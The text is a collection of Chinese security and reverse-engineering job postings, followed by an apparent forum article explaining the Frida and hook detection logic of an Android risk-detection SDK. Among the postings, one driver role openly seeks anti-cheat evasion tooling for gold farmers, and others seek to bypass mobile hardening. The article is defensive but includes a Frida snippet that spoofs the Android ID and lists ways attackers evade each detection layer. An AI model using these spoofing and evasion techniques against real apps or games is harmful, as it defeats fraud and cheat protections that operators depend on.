6.对侧信道错误注入等安全攻击方式原理有一定的了解。对侧信道相关攻击设备有一定的了解。

AI算法对抗专家

薪资：60-70k

就职地点：宁波

岗位职责：

1. 研究针对机器学习模型（特别是深度学习模型）的攻击方法与防御技术。

2. 设计与实现对抗样本检测、模型加固、隐私保护等安全算法。

3. 对业务中部署的AI模型进行安全性评估与红队对抗演练。

4. 开发自动化工具，将对抗防御能力集成到AI模型开发与部署生命周期中。

5. 对外影响力输出，显著提升公司在产业界、学术界及监管层面的品牌影响力与技术公信力。

岗位要求：

硕士及以上学历，计算机科学、人工智能、信息安全等相关专业。工作年限大于5年，有行业知名安全或科技公司工作经验优先。
精通机器学习/深度学习原理，熟悉TensorFlow、PyTorch等框架。
深入了解对抗机器学习领域的经典与最新攻击防御技术。
具备扎实的编程能力和算法实现经验，有相关顶会论文或实战项目者优先。

AI大模型安全专家

薪资：60-70k

就职地点：宁波

岗位职责：

负责AI原生安全研究与AI赋能传统安全变革，包括但不限于：

1. 研究大模型（LLM）在训练、微调、部署、应用各阶段的安全风险与攻击面；

2. 开发针对提示注入、越狱、数据提取等攻击的检测与防御方案；

3. 构建大模型安全评测基准与自动化评估平台；

4. 参与设计安全的大模型应用架构与治理流程；

5. 参与行业标准的制定，显著提升公司在产业界、学术界及监管层面的品牌影响力与技术公信力。

岗位要求：

硕士及以上学历，计算机科学、人工智能、信息安全等相关专业。工作年限大于5年，有行业知名安全或科技公司工作经验优先。
精通机器学习/深度学习原理，熟悉TensorFlow、PyTorch等框架。
深入了解对抗机器学习领域的经典与最新攻击防御技术。
具备扎实的编程能力和算法实现经验，有相关顶会论文或实战项目者优先。

长按识别关于岗位详情及投递简历

♥

四川五颗糖科技有限公司

Windows音视频引擎高级开发工程师

薪资：12-30k

就职地点：成都

岗位要求：

1.负责Windows平台音视频核心引擎开发，基于Windows图形栈完成音视频采集、渲染模块的设计与优化，保障音视频画面的高质量呈现；

2.主导音视频传输模块的架构搭建与性能调优，运用Windows网络编程技术优化流媒体传输链路，攻克低延迟传输难题，提升实时音视频通信的稳定性与流畅度；

3.基于无锁（Lock-Free）、无等待（Wait-Free）等非阻塞同步机制，完成多线程音视频处理模块的开发与优化，最大化利用CPU资源，避免线程阻塞与资源竞争问题；

4.承担音视频模块的动态调试与日志分析工作，通过专业工具定位并解决音视频编解码、传输、渲染过程中的各类复杂Bug，形成可复用的问题排查方法论；

5.参与音视频技术方案的评审与落地，跟进行业前沿技术趋势，持续推动团队音视频技术能力的迭代升级。

任职要求：

本科及以上学历，计算机相关专业，3年以上音视频开发经验，精通Windows图形栈（如DirectX、GDI+等）；
熟悉H.264、H.265等主流视频编解码标准及AAC、MP3等音频编解码技术，具备FFmpeg、WebRTC等音视频框架的实际开发经验；
精通Windows网络编程，熟练掌握TCP/UDP、RTP/RTSP等传输协议，有音视频低延迟传输优化项目经验者优先；
深入理解多线程编程模型，熟练运用Lock-Free、Wait-Free等非阻塞同步机制进行多线程优化，能独立解决线程竞争、死锁等复杂问题；
掌握专业的动态调试工具（如WinDbg、Visual Studio调试器）与日志分析方法，具备较强的Bug根因分析能力，能快速定位并解决音视频系统中的疑难杂症；
具备良好的编码规范与文档编写能力，拥有较强的团队协作意识与问题解决能力。

驱动开发

薪资：12-30k

就职地点：成都

岗位技术要求：

1.Windows内核与驱动开发，深入理解Windows操作系统内核原理，熟练运用WDF / KMDF / WDM框架编写驱动程序。能熟练使用WinDbg等内核调试器进行远程调试。熟悉ObRegisterCallbacks进行进程/线程保护，利用MiniFilter监控文件系统，并能通过挂钩SSDT等技术监控内核API调用；

2.软件逆向与攻防对抗，需熟练掌握x86/x64汇编指令集，能熟练使用IDA Pro、x64dbg等工具进行静态分析和动态调试。理解PE文件格式，以及IAT Hook、Inline Hook等注入原理。并能应用NtQueryInformationProcess检测进程调试状态、设置硬件断点来对抗反调试；

3.应用层与多开实战经验，需要熟悉常见的游戏多开检测手段，如：互斥体(Mutex)、内存映射文件、全局原子表、窗口类名/标题、进程遍历等。能开发多开隔离器，如使用CreateDesktop或沙盒技术实现进程隔离。并了解虚拟机逃逸与检测技术；

4.现代反作弊系统研究，了解主流反作弊系统的技术特征，如腾讯ACE的全面防护、EAC与BattlEye的严格环境检查，以及PUBG的做法。深入理解这些系统对内存完整性、硬件指纹与时序分析等新型检测维度的方向；

5.3-5年或以上Windows底层开发经验，1年以上真实内核开发或维护经验。本科及以上，优先考虑计算机科学与技术、软件工程、网络安全等专业。软技能：极强的学习能力，持久的毅力、耐心和强烈的团队合作意识；

和项目前景：游戏工作室、代练、金农等群体对稳定多开和多开挂机有刚性需求。提供比沙盒更隐蔽、比虚拟机更高效的驱动级方案存在商业空间。

长按识别关于岗位详情及投递简历

♥

成都梦诺科技有限公司

高级逆向开发工程师

薪资面议

就职地点：成都

岗位职责：

1.针对安全协议、加解密算法、签名机制及认证流程进行逆向；

2.针对常见移动端安全加固进行绕过。

任职要求：

3年以上 Android逆向经验；
熟练使用 Jadx,Jeb,Xposed,Ida,Frida 等逆向工具；
熟悉网络通讯、代理机制，抓包、https、sslpinning、proxy机制；
熟悉各种通用加解密算法，有脱壳、反混淆、反调试、反检测等对抗经验；
熟悉Java/c/c++语言，smali,ARM汇编；能够静态动态分析调试app、sdk、so;
能分析ollvm后代码，了解vmp原理并具备分析能力者优先；
可独立完成App逆向工作。

公司福利：

1.五险一金

2.法定节假日、带薪年假、病假、婚假、丧假、产假、陪产假等；

3.妇女节、端午节、中秋节、春节等精美礼品；

4.下午茶、团建、生日会、咖啡

*不考虑逆向开发方向或无逆向基础的同学，请勿打扰！

长按识别关于岗位详情及投递简历

极海微电子股份有限公司

固件分析工程师

薪资：30k以上

就职地点：珠海

工作经验：5-10年

学历要求：本科

工作职责：

物联网设备安全研究，渗透测试，漏洞挖掘和漏洞利用，负责嵌入式软件分析。

任职要求：

1.熟悉二进制漏洞原理及利用方式，尤其是对嵌入式系统的安全问题有深刻理解；

2.有一定的攻防、渗透、漏洞挖掘的经验；

3.有固件重建和固件仿真经验者优先，如firmware-mod-kit和qemu等软件；

4.熟练使用WinDBG、IDA Pro、OllyDBG、Binwalk等调试、逆向工具；

5.熟悉ARM架构，有较强的动手能力，有物联网设备调试接口和固件提取经验优先；

6.智能硬件破解大赛获奖或者发言的优先；

7.信息安全/计算机科学与技术专业/软件工程等软件相关专业优先考虑。

长按识别关于岗位详情及投递简历

♥

深圳软牛科技集团股份有限公司

高级逆向开发工程师

薪资面议

就职地点：深圳

工作经验：3-5年

学历要求：本科

【岗位职责】

1.主要从事win和mac平台上的功能开发；

2.负责公司数据类/音视频相关产品的功能软件框架设计、编码实现；

3.负责产品相关的功能需求评估、可行性分析，技术难点预研；

4.负责项目推进把控，协调分配开发任务，针对对市场反馈进行软件策略调整；

【任职要求】

本科及以上学历，3-5年PC端逆向开发工作经验；
熟练掌握C++底层原理，熟悉Win32 API、STL的操作使用；
熟悉反编译、反汇编以及各类逆向工具软件的使用，熟悉常见x86、arm汇编指令、常见的反调试技术、加壳脱壳原理，对软件逆向有相应研究；
有较强的探索钻研精神，对逆向有强烈兴趣，解决问题思路灵活。

逆向开发工程师

薪资面议

就职地点：成都

工作经验：应届毕业生

学历要求：本科

【岗位职责】

1.主要从事win和mac平台上的产品功能逆向开发；

2.负责数据类\多媒体类相关产品的功能编码实现与维护工作；

3.负责数据类\多媒体类产品相关的技术攻关工作，并开发实现对应产品功能。

【任职要求】

本科及以上学历，2026届计算机相关专业优先；
熟悉反编译、反汇编以及各类逆向工具软件的使用，熟悉常见x86、arm汇编指令、常见的反调试技术、加壳脱壳原理，有实操经验优先；
C++基础扎实、理解C++原理，熟悉Win32 API、STL的基本使用；
熟悉Windows消息机制，数据库编程，网络编程、熟悉常用算法；
有较强的探索钻研精神，对逆向有强烈兴趣，解决问题思路灵活。

长按识别关于岗位详情及投递简历

♥

北京数戎星河科技有限公司

安全研究/渗透/漏挖

薪资：30k以上

就职地点：北京

岗位要求:

高级渗透负责人：3人，应届实习生10人。

1.跟踪研究APT组织技战法包括但不限于边界突破、横向移动、数据回传等，依据TTPs做组织归因。

2.聚焦WEB安全研究、移动端安全研究、云安全研究、供应链安全研究、边界硬件设备安全研究、漏洞挖掘、逆向研究等。

3.具备丰富实战经验优先。

以上3点符合其中一条即可。

网络攻防研究合伙人

薪资：30k以上

主要职责:

负责网络攻防实战技术研究：系统化跟踪研究网络安全攻防技术，孵化各类安全产品落地。我们需要自驱型高效学习能力、对技术保持热忱的合伙人，不招牛马！！！

学历要求：

2025或2026届应届硕士毕业生，或在读。C9、985、211优先。

专业背景：

计算机科学、网络安全、网络工程、人工智能等相关专业硕士及以上学历（能力突出者可放宽至本科）。

工作地点：

北京/广州/上海/深圳/杭州/武汉/南京/合肥（需全职实习，支持异地转岗），部分地区提供免费住宿。

技术能力：

对技术保持长期热忱，高效学习研究能力。

核心素质：

自驱力强：能独立规划研究方向，持续跟进安全动态。

实习物质待遇：

薪资10,000元/月。

实习期间没有领导，没有管理，完全自由发挥。

转正待遇：

起薪30,000元/月 + 月度奖金。（年薪50w起步），能力强的上不封顶。

全额五险一金、带薪年假、项目奖金及股权激励计划。

公司提供国内外行业最前沿研究资料及实战环境，与国内外优质资源包括但不限于人、财、物。

简历投递：

邮箱 liangruohan0106@163.com

邮件标题格式：姓名-学校-毕业年份-应聘城市（例：张三-中科大-2026届-合肥）。

申请材料：

个人简历（含GPA及排名）。

推荐奖励：

推荐成功，奖励现金5000元/人，欢迎各位师傅推荐，自荐。

长按识别关于岗位详情及投递简历

♥

杭州光年数据科技有限公司

Android 安卓 ROM 开发工程师

薪资面议

就职地点：杭州

职责：

1. 负责安卓系统的定制开发，包括系统功能改善、性能优化和用户界面更新；

2. 了解并应用google pixel手机硬件规格对系统ROM进行定制开发；

3. 处理与ROM相关的bug诊断、调试和修复工作；

4. 与团队合作，集成新的硬件支持和服务框架；

5. 在兼容性方面进行测试，确保ROM在不同型号的google pixel手机上运行流畅无误；

6. 跟进最新的Android操作系统更新和安全补丁，保持系统的稳定性和安全性；

要求：

计算机科学、软件工程或相关领域的本科及以上学位；
拥有至少3年Android系统开发经验，具有google pixel手机ROM开发优先；
熟悉Android系统架构、内核、引导程序、固件、驱动程序和ROM烧录过程；
对google pixel手机硬件有深入了解，能根据硬件特性进行ROM优化；
熟练掌握Java、C/C++等编程语言，有良好的代码编写习惯；
具备良好的问题解决能力，能独立分析和修复系统级问题；
熟悉常用的开发和调试工具，如Git, ADB, Fastboot等；

加分项：

1. 有开源社区贡献经验

2. 在硬件驱动开发或系统平台组件定制等领域有特别的专长；

前端开发工程师

薪资面议

就职地点：杭州

岗位职责：

1.公司SAAS平台各模块的前端开发

2.部分平台以及小程序的开发

3.调研新技术、优化SAAS平台前端性能和兼容性

任职资格：

熟练掌握HTML5、CSS3、JavaScript原生开发、W3C标准与ES规范
熟悉前端自动化和工程化，熟悉webpack，有TypeScript开发经验
React，VUE，Angular至少熟悉一种框架，掌握其原理，能独立开发常用组件
熟练使用 AI 辅助编程工具（如 Cursor, GitHub Copilot 等）
丰富的实践经验，能高效利用这类工具进行日常编码、代码补全、错误诊断和文档生成。

评估方式：

面试中将包含实际场景测试，评估候选人运用 AI 工具解决具体编码问题的效率和质量。

加分项：

1.有优秀的开源项目

2.有全栈开发经验

3.有跨端开发经验（electron\uniapp\rn\flutter）

Android/逆向/Hook工程师

薪资面议

就职地点：杭州

岗位职责：

1.负责安卓 APP 的逆向工作。

2.负责编写 Hook 代码进行 APP 业务逻辑的复现，提供外部应用接口。

3.风控对抗以及解决安卓系统环境可能存在的问题。

4.不断学习和适应行业内新出现的逆向技术和工具。

任职要求：

5年及以上安卓端逆向相关经验，良好的问题解决能力和发散思维及动手能力。
掌握 JEB，Frida, IDA, Unidbg, AndroidNativeEmu 等逆向工具使用。
能够熟练编写 Frida 脚本进行 Hook 以及对算法或流程进行模拟，能够熟练进行动态追踪。
对常见 APP 有逆向经验，有实际业务应用的案例。
熟悉 Mitmproxy 等抓包技术，对 SSL pinning 等逆向防护措施有深入了解。
熟悉 python、golang 等任何一门后端语言。

附加分：

1、熟悉安卓系统底层命令及环境。

2、熟悉安卓 ROM 编译刷机及基础的功能定制修改。

3、熟练使用 Linux 命令及编写 shell 脚本。

后端Go开发工程师

薪资面议

就职地点：杭州

工作职责

1.负责通过 REST API 对接两个不同的订单系统，实现订单，商品，售后数据的双向同步。

2.详细分析两个系统的订单数据结构、API 文档和业务逻辑。

3.设计和实现 API 接口，负责订单数据的转换、格式化和验证。

4.编写高质量的代码，并进行单元测试和集成测试，确保数据同步的准确性和可靠性。

5.撰写技术文档，记录开发过程、接口定义、数据映射关系和解决方

案。

6.监控系统运行状态，及时解决数据同步过程中出现的错误和异常。

任职要求

熟悉 OMS（订单管理系统）和 ERP（企业资源规划）的相关概念，理解订单生命周期和流程。
3年以上Go语言开发经验，熟练掌握Gin、Echo等主流框架。
具备高并发系统开发能力熟练使用MySQL/PostgreSQL、Redis等数据库。
具备数据库设计和性能优化能力。
了解数据同步的常见方案和技术，例如消息队列、数据库同步工具等。
具备良好的代码风格和文档习惯，并能够进行代码审查。
具备较强的学习能力和问题解决能力，能够独立分析问题并找到解决方案。

加分项

1.有OMS/ERP/WMS系统开发或集成项目经验

2.具备微服务架构设计和实施经验

3.熟悉Kubernetes、服务网格等云原生技术

4.有电商、零售行业业务背景

5.具备系统性能调优和故障排查经验

6.熟悉大语言模型（LLM）应用开发，有RAG、Agent等技术实践经验

长按识别关于岗位详情及投递简历

♥

戳下方二维码立即投递简历

企业招聘合作咨询

球分享

球点赞

球在看

点击阅读原文『投递简历』

https://bbs.kanxue.com/user-home-949425.htm

RiskEngine 开源设备指纹和风险监测SDK

Fri, 08 May 2026 17:59:00 +0800

WsttXm 2026-05-08 17:59 上海

看雪论坛作者ID：WsttXm

RiskEngine是我开源在 GitHub 上的一个 Android 端设备指纹采集 + 风险检测 SDK。Java + C++17 双层结构，纯离线，进 App 之后调一次`RiskEngine.collect()`拿一份`RiskReport`。

整篇按"招式"排，一招一招拆。Frida 检测占一半多的篇幅，是整个 SDK 最重的部分，按"对抗演化"的层次从入门级一路讲到内存级。

项目大致长什么样

代码组织上分两层：

Java 层放riskengine-sdk/src/main/java/com/wsttxm/riskenginesdk/，对外 API、各类业务级检测、调度编排
Native 层 C++17 写在riskengine-sdk/src/main/cpp/下，做接触/proc、解析 ELF、走系统调用这些"敏感动作"

入口长这样：

RiskEngineConfig config = new RiskEngineConfig.Builder()
        .debugLog(true)
        .collectTimeout(15000)
        .build();
RiskEngine.init(context, config);
RiskEngine.collect(new RiskEngineCallback() {
@Overridepublic void onSuccess(RiskReport report) {
Log.d("RiskEngine", "Risk: " + report.getOverallRiskLevel());
Log.d("RiskEngine", "Score: " + report.getRiskScore());
    }
@Overridepublic void onError(Throwable error) {}
});

接的人不用关心内部细节，等回调就行。但要看安全设计，得看回调背后的逻辑。

代码盘点：12 个 Detector（root、hook、模拟器、调试、mount、ADB、进程扫描、沙箱、云手机、自定义 ROM、方法完整性等），十多个 Collector（android_id、build props、telephony、wifi、bluetooth、签名、屏幕、容器信号等）。Native 那边还有 5 个原生检测器和若干原生采集器。

招式一：Android ID 读了 4 遍

采集层定下的第一条原则：单源采集顶多算"原始数据"，做不了"指纹"。

Android ID 这种东西，绝大多数人一行就完事：

String id = Settings.Secure.getString(
        context.getContentResolver(), Settings.Secure.ANDROID_ID);

放在风控里这就是个一行就能 hook 掉的"假指纹"——一段 Frida 脚本：

Java.use("android.provider.Settings$Secure")
    .getString.overload(...).implementation = function() {
return "0123456789abcdef";
    }

设备指纹工作直接归零

collector/java_layer/AndroidIdCollector.java里同一个 Android ID 从 4 个独立路径各读一遍：

@Override
protected void collect(CollectorResult result) {
collectViaSettingsApi(result);
collectViaNameValueCache(result);
collectViaContentResolver(result);
collectViaContentQuery(result);
}

四条路：

Settings.Secure.getString
标准 API，最常见的一条
反射 sNameValueCache.mValues，直接掏 Settings 的内部缓存。这条要绕 hidden API，加了 HiddenApiBypass.addHiddenApiExemptions("")
ContentResolver.call("GET_secure", "android_id")
，走 ContentProvider 的 call 通道
content query
命令行，直接 fork 一个 content query --uri content://settings/secure ... 子进程读 stdout

四路读到的值丢同一个CollectorResult，由core/DataAggregator.java比对一致性。DataAggregator第 27 行起：

if (fingerprint.hasInconsistency()) {
List<String> inconsistent = fingerprint.getInconsistentFields();
List<String> details = List.of("inconsistent_fields:" + ...);
    allDetections.add(new DetectionResult(
"multi_source_validation",
RiskLevel.HIGH,
DetectionStatus.DANGER,
6, 10, false, details, evidence
    ));
}

任意两路不一致直接合成一个multi_source_validation的 HIGH 级检测项。

这个设计的关键不在每条单路读到了什么，而在让攻击方同时维护四条路径的一致性。hook 一个静态 Java 方法，一行 Frida 就够。要让四条路全部返回"一致的伪造值"，要做的事是：

hookSettings.Secure.getString
hook 反射读mValues的路径，要么 hookField.get，要么 hook 整个 ArrayMap 的get
hookContentResolver.call
拦截content query子进程的 stdout——这条最难，子进程不在 inject 的进程里

第四条命令行通道，要拦只能 root 之后 hook 整个 system_server 改 settings provider，或者拦 shell 调用本身，工作量级跳一档。加这一路就是冲着"hook 不到的同进程外路径"来的。

招式二：把检测下沉到 syscall

讲完 Java 层多源，再看 native 层。

Frida 在 Android 上的入侵姿势，一大半都是 hook libc 的几个常用函数：openopenatreadfopenfgetspread。原因很简单——绝大部分检测代码（不管是 Java 的FileReader还是 C 的fopen）底层都会落到 libc，hook 一个就能拦一片。

cpp/util/syscall_wrapper.cpp里直接走 raw syscall：

// Use raw syscall to avoid libc hooks
longmy_openat(int dirfd, constchar *path, int flags, mode_t mode) {
return syscall(__NR_openat, dirfd, path, flags, mode);
}
longmy_read(int fd, void *buf, size_t count) {
return syscall(__NR_read, fd, buf, count);
}
longmy_close(int fd) {
return syscall(__NR_close, fd);
}

syscall(__NR_openat, ...)不走 libc 的openat包装函数，直接通过syscall这个汇编入口（ARM64 上是svc #0指令）陷入内核。Frida 默认 hook 的是 libc 的openat符号，syscall 路径完全绕开它。

如果攻击方只是Interceptor.attach(Module.findExportByName("libc.so", "openat"), ...)这种常规姿势，对 native 检测路径完全失效。要绕开这条得搞内核态 hook（kprobe / sys_call_table 改写），需要 root + 内核级访问；或者扫指令找到所有svc #0全部插桩，技术上能做，Frida 默认不干。工作量级再跳一档。

syscall_wrapper.cpp底下还封装了一个read_file_content，把 openat + read + close 包成一个函数，几乎所有 native 检测器读 proc 文件都走它。

重头戏：Frida 检测的六层楼

这部分是 RiskEngine 最重的一块，单独放出来讲。

这一块设计的时候有个明确的层次：从最入门的字符串扫描到最高级的内存检测，每一层都是独立的检测维度，单独看都可能被绕掉，但堆在一起就强迫攻击方在所有维度同时绕过。每层按"常规做法 + 容易被绕的姿势 + RiskEngine 怎么做"展开。

第 0 层：先把 Frida 怎么进来的捋清楚

讲检测前先讲对手怎么动手。Frida 在 Android 上有两种主要落地方式：

frida-server模式：电脑 PC 通过 USB / TCP 连一个跑在手机上的frida-server，server 默认 27042 listen，跟客户端用 D-Bus over TCP 通信。需要 root，server 要 ptrace 目标进程。

frida-gadget模式：把libfrida-gadget.so重打包进目标 APK，进程一启动System.loadLibrary把 gadget 装载进自己进程，gadget 自己跑一个 listener 等远程脚本连过来。不需要 root。

不管哪种，落到目标进程内一定会留下三类痕迹：

被注入的代码
——要么是 gadget 的 .so，要么是 server 端 ptrace 进来注入的代码段
新增的线程
——Frida runtime 起来要起 GLib 主循环、JS 引擎线程
被改过的内存或指令
——这是 hook 的本质，要让原方法跳到 hook 实现，就得改原方法的入口

下面六层检测顺着这三个维度排，越往上越靠近"物理痕迹"那一边。

第 1 层：常规 Frida 检测

入门三招：扫字符串、扫线程名、扫端口。这三招实现简单、成本极低、单独看都能被绕掉。先把这三招过一遍，再讲为什么留着。

扫字符串。开/proc/self/maps，看里面有没有 frida 相关字串。HookFrameworkDetector.java第 96 行起：

try (BufferedReaderbr =new BufferedReader(new FileReader("/proc/self/maps"))) {
    String line;
while ((line = br.readLine()) != null) {
Stringlower = line.toLowerCase();
if (lower.contains("frida") || lower.contains("gadget")) {
            addStrong(details, score, "frida_maps:" + line.trim());
break;
        }
    }
} catch (Exception ignored) {}

maps 一行行读，全转小写，看里面有没有frida或gadget。绕这层有两种姿势：把libfrida-gadget.so改名成libutils_v2.so重打包进 APK，maps 里再没 frida 字样了；或者 hookopen/openat，让读/proc/self/maps时返回伪造内容。第二条 Java 路径走FileReader最终落到 libc 不抗 hook，但 native 路径走 raw syscall 不在此列。

扫线程名。Frida runtime 起来后会在进程里创建带特征名的线程：gum-js-loop、gmain、pool-frida、gdbus。这些是 GLib 和 GUM 库内部线程，启动时就 setname 了。HookFrameworkDetector.java第 116 行起：

java.io.FiletaskDir =new java.io.File("/proc/self/task");
java.io.File[] tasks = taskDir.listFiles();
if (tasks != null) {
for (java.io.File task : tasks) {
        java.io.Filecomm =new java.io.File(task, "comm");
if (comm.exists()) {
try (BufferedReaderbr =new BufferedReader(new FileReader(comm))) {
StringthreadName = br.readLine();
if (threadName != null && (threadName.contains("gum-js-loop")
                        || threadName.contains("gmain")
                        || threadName.contains("frida"))) {
                    addMedium(details, score, "frida_thread:" + threadName);
                }
            }
        }
    }
}

遍历/proc/self/task/，每个子目录是一个线程的目录，里面comm文件存线程名。

/proc/[pid]/comm和/proc/[pid]/task/[tid]/comm不是同一个东西。前者是进程主线程的名字，后者是某个具体线程的名字。Frida 是开新线程，主线程名字它没改，所以必须遍历 task 子目录。

绕这一层的姿势：在 Frida 启动时 hookprctl(PR_SET_NAME)把线程名替换；或者拿 Frida 源码改名重新编译，把gum-js-loop改成worker-x；又或者拦截/proc/self/task的目录读取（hookgetdents64），过滤掉 frida 的 tid——native 走 rawgetdents64把这条打回去了。

扫端口。frida-server默认 27042 listen，最直接的检测就是 connect 这个端口：

try {
Socketsocket =new Socket();
    socket.connect(new InetSocketAddress("127.0.0.1", 27042), 120);
    socket.close();
    addMedium(details, score, "frida_port_open:27042");
} catch (Exception ignored) {}

HookFrameworkDetector.java第 108 行那段。短小精悍，攻击方一行frida-server -l 0.0.0.0:9999换端口就破。

升级版在util/ProcfsUtils.java第 91 行：

public static Set<Integer> findLoopbackListeningPorts() {
LinkedHashSet<Integer> ports = new LinkedHashSet<>();
collectLoopbackPorts("/proc/net/tcp", ports);
collectLoopbackPorts("/proc/net/tcp6", ports);
return ports;
}

不再固定端口，直接读/proc/net/tcp和/proc/net/tcp6，把所有 LISTEN 状态、绑在回环地址（127.0.0.1、::1、0.0.0.0、::）的端口列出来。

/proc/net/tcp的格式可以照抄写 parser，不用查文档：

sllocal_addressrem_addresssttx_queuerx_queuetrtm->when retrnsmt   uid ...
0: 0100007F:69A2 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000 ...

每行一个连接。第二列local_address是 16 进制的IP:PORT，前 8 位是 IP（小端），后 4 位是端口。第四列st是状态，0A就是 LISTEN。

ProcfsUtils.readTcpTable干的就是把这玩意儿解析出来，isListening()比对状态、isLoopback()判断是不是回环，组合后拿一份"本机所有 LISTEN 端口"。绕这层还能让 server 不 listen，切到 gadget 模式——gadget 默认是进程内通信，可以不开端口。这就把战场推到内存检测那一档去。

那这三招既然都能被绕，为什么还要留？

留着抓蠢的。现实里相当一部分外挂作者、爬虫开发者、刚学 Frida 的萌新，就是装上 frida-server 直接连过来跑脚本，不做任何隐藏。这三条规则一秒能把这一拨人全部拦掉。底层用便宜的规则筛掉量级最大的那批低质攻击，把昂贵的检测预算留给真正有威胁的少数对手——这是任何风控系统都该有的一层。

下一档开始进入"扫到了之后还要确认它真是 frida"这一阶段。

第 2 层：D-Bus 协议探针

第 1 层有个隐患：扫到一个 LISTEN 端口，但怎么确认它就是 frida-server？万一是别的合法服务呢？

这里换协议指纹。Frida 内部通信走 D-Bus over TCP。D-Bus 协议有个特点：客户端连上来要先发一个 NUL 字节加 AUTH 命令开始握手，服务端拒绝（认证失败、协议不对）会回一个以REJECTED开头的响应。

util/ProcfsUtils.java第 212 行：

public static String probeDbus(int port, int timeoutMs) {
try (Socket socket = new Socket()) {
        socket.connect(new java.net.InetSocketAddress("127.0.0.1", port), timeoutMs);
        socket.setSoTimeout(timeoutMs);
        socket.getOutputStream().write("\0AUTH\r\n".getBytes(StandardCharsets.US_ASCII));
        socket.getOutputStream().flush();
byte[] buffer = new byte[96];
int read = socket.getInputStream().read(buffer);
if (read <= 0) return "";
return new String(buffer, 0, read, StandardCharsets.US_ASCII).trim();
    } catch (Exception ignored) {
return "";
    }
}

发出去的 payload 就一个 NUL +AUTH\r\n，故意不带任何认证内容。frida-server 这种走 D-Bus 的会回REJECTED EXTERNAL或类似字串。普通 HTTP 服务器、其他 RPC 服务都不会有这种回包。

误报率几乎为零。这一招的价值在于把"扫端口"升级成"协议握手"，准确率拉满。

回到HookFrameworkDetector.java第 137 行，把第 1 层和第 2 层串起来：

Set<Integer> loopbackPorts = ProcfsUtils.findLoopbackListeningPorts();
for (Integer port : loopbackPorts) {
if (port == null || port <= 0) continue;
String response = ProcfsUtils.probeDbus(port, PROBE_TIMEOUT_MS);
if (response.toUpperCase().startsWith("REJECT")) {
addStrong(details, score, "dbus_reject:" + port);
    }
}

把第 1 层拿到的所有 LISTEN 端口逐个发 D-Bus 探针。

举一反三：很多敏感工具都可以用类似思路做协议指纹。adbd在 5555 上跑，连过去发host:version回包带版本号；gdbserver连过去发+，回包是$qSupported#73这种 GDB Remote Serial Protocol 报文；debugserver（lldb 那边）也有自己的 banner。只要愿意花时间读协议规范，"高准确率指纹"全都能写出来。

绕这一层只能把 frida-server 的通信协议从 D-Bus 换成自定义二进制协议。技术上能做，等于自己 fork 一个 frida-tools 维护，几乎没人愿意。

第 3 层：把进程和端口绑起来

到第 2 层，已经能很精准地判断"本机有 D-Bus 服务在监听"。但还有一个细节：怎么证明这个服务就是 Frida而不是别的什么 D-Bus 应用？

HookFrameworkDetector.java第 151 行又加了一道门：

List<Integer> pids =ProcfsUtils.findPidsByNameFragments(
"frida-server", "frida_helper");
for (Integer pid : pids) {
    addStrong(details, score, "frida_pid:" + pid);
for (Integer port : ProcfsUtils.findPidLoopbackListeningPorts(pid)) {
        addStrong(details, score, "frida_pid_port:" + port);
    }
}

逻辑分两步：

第一步，扫遍/proc/[pid]/，从comm和cmdline里找名字带frida-server或frida_helper的进程，捞出所有候选 PID。findPidsByNameFragments干这事。

第二步，针对每个候选 PID，读/proc/[pid]/net/tcp和/proc/[pid]/net/tcp6——这个文件存的是这个进程能看到的 socket 表（在 net namespace 下），一样能找出它在 listen 哪些回环端口。

进程身份和端口监听绑死：哪怕攻击者改了端口、又装作其他服务，只要"某个进程同时具备 frida 进程特征 + 在 listen 一个回环端口"，就 strong 信号直接打。

测过的对手里有把 frida-server 改名叫media.codec_v2、端口换成 31337、还专门起了个伪装 ContentProvider 抢答其他检测的。这套规则（进程名特征 + 进程独立持有的端口表）是当时唯一稳稳钉死它的检测项。

多源关联是反作弊一切方法的灵魂。单维度检测一打就穿，两个维度对上了可信度翻倍，三个维度对上了攻击者几乎赖不掉。

但到这里所有检测都还在"看名字、看协议、看端口"——只要攻击者把 Frida 改造得彻底匿名（gadget 模式、不开端口、不用 D-Bus），上面这三层都会失效。

下面进入项目最硬的一层。

第 4 层：内存层——看物理痕迹

前面讲过 hook 的本质：要让原方法跳到 hook 实现，就得改原方法的入口。这是绕不过去的事实。代码可以重命名，端口可以换，协议可以改，要 hook 一个函数那个函数的内存就一定会变。最高级的检测都在内存层。

cpp/detector/native_hook_detector.cpp里干了三件事，盯三种"内存痕迹"。

痕迹一：anon_exec 匿名可执行内存段

正常 APK 里的 .so 文件加载进来，maps 里那一行一定有pathname字段对应文件路径。frida-gadget 通过mmap(MAP_ANONYMOUS | PROT_READ | PROT_EXEC, ...)注入的代码段，路径列是空的。

native_hook_detector.cpp第 128 行：

bool is_suspicious_executable_region(const MapEntry &entry) {
if (entry.end <= entry.start || entry.perms.size() < 3) return false;
if (entry.perms[0] != 'r' || entry.perms[2] != 'x') return false;
    std::string lower = to_lower(entry.raw);
if (contains_any(lower, {
"dalvik-jit", "jit-cache", "zygote", "scudo", "linker_alloc",
"memfd:jit", "vdex", "boot-framework", "[vectors]"
    })) {
return false;
    }
return entry.path.empty();
}

判定：可读 + 可执行（r-xp）、路径空、不在白名单里。后面这个白名单是关键——Android 自己的 ART 就有一堆合法的匿名可执行段（JIT 编译出来的代码、dalvik-jit、memfd:jit），不排掉它们误报满天飞。误报治理的代码占整个检测器近一半篇幅，但生产环境必须有。

maps 的格式：

addr_start-addr_end perms offset dev inode pathname
7f4a000000-7f4a020000 r-xp 00000000 fd:00 12345 /system/lib64/libc.so

每行一个内存段，pathname 缺失就是匿名映射。

绕这一层的姿势：在 mmap 之后改/proc/self/maps的内容——不行，maps 是内核生成的虚拟文件，应用层改不了。只能 hook 读路径。但 native 走的是 raw syscall + 自己 parse，hook libc 没用。

更高级的姿势：把代码段提前 mmap 到一个有合法路径的文件后面，伪造成系统库延伸。这要么对应文件不存在（fstat 一查就露），要么得真的预先放一个伪造文件落盘——工作量级再跳一档。

痕迹二：ARM64 inline hook 的 trampoline 指令模式

inline hook 的本质：把目标函数开头几条指令替换成跳转指令，让程序跳到 hook 实现，hook 实现执行完再跳回原指令的下一条。

ARM64 上一种最常见的跳板写法：

LDR  X16, =target_addr   ; 把目标地址加载到 X16
BR   X16                 ; 无条件跳转到 X16

这两条指令在机器码里有非常稳定的模式。native_hook_detector.cpp第 94 行起：

boolis_arm64_ldr_literal(uint32_t instruction) {
return (instruction & 0x3B000000u) == 0x18000000u;
}
boolis_arm64_br(uint32_t instruction) {
return (instruction & 0xFFFFFC1Fu) == 0xD61F0000u;
}

